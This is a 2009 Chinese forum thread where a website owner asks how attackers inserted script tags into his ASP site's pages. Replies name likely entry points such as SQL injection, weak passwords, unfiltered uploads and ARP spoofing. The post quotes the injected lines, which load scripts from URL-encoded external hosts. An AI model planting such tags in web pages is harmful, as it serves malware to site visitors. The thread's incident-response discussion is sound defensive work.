如何植入的", "upDate": "2021-05-28T16:12:25+08:00" }

如何植入的

wxlkeepmoving 2009-08-31 09:34:33
如题,最近我的网站被挂马了。asp+access的网站。查看源文件,在一些源文件的底部</html>的后面多了<script src=http://%76%63%63%64%2E%63%6E></script>的代码。我想知道,黑我网站的人是怎样把这句话写入我的源文件里的呢?有点菜的问题,希望高手不吝赐教。
...全文
225 9 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
9 条回复
切换为时间正序
请发表友善的回复…
发表回复
Dogfish 2009-09-01
  • 打赏
  • 举报
回复
一打开这个页面,我的电脑就警告。

方法类似
http://blog.csdn.net/dogfish/archive/2009/01/23/3851027.aspx
Dogfish 2009-09-01
  • 打赏
  • 举报
回复
sql注入。
coollele 2009-09-01
  • 打赏
  • 举报
回复
我前段时遇到黑我网站的人不是写到源代码,而是写入数据库每个字段里,在网上查了查,是SQL注入; 后来通过日志查到他用的是二进制代码通过页面的录入框写入的;
一般的防SQL注入对它不起作用; 最后通过查检录入字符长度来限制;

问题解决.
凡夫与俗子 2009-09-01
  • 打赏
  • 举报
回复
先排除局域网中毒
确定是自己网站以后
研究自己网站那些文件做了手脚
然后研究日志,看看有什么蛛丝马迹,顺藤摸瓜
凡夫与俗子 2009-09-01
  • 打赏
  • 举报
回复
N种可能。
例如,程序没有过滤传入字符
例如,后台使用弱密码
例如,上传没有过滤危险文件
例如,同服务器站点被黑
例如,同局域网中了arp,(加入源码没有这段,但网页上有,那一般就是这个。)
fxcjy 2009-09-01
  • 打赏
  • 举报
回复
有可能是主机漏洞
jypcxgzl 2009-09-01
  • 打赏
  • 举报
回复
肯定你的网站哪儿有漏洞被利用了。
wxlkeepmoving 2009-09-01
  • 打赏
  • 举报
回复
我的数据库没有被改变。只是我的源代码里多了这么一句<script src=http://%76%63%63%64%2E%63%6E> </script>,这是怎么回事呢?
如我的网页文件的结尾:
</body>
</html>
<script src=http://%77%2E%73%69%79%6F%75%2E%6F%72%67%2E%63%6E></script>。
结尾就是无缘无故的多了这么一句,黑我网站的人是怎么写入的呢?不明白?
hblhshb 2009-09-01
  • 打赏
  • 举报
回复
如果有FSO组件权限的话写个循环,给你的所有.asp文件写入段代码是非常简单的

28,409

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧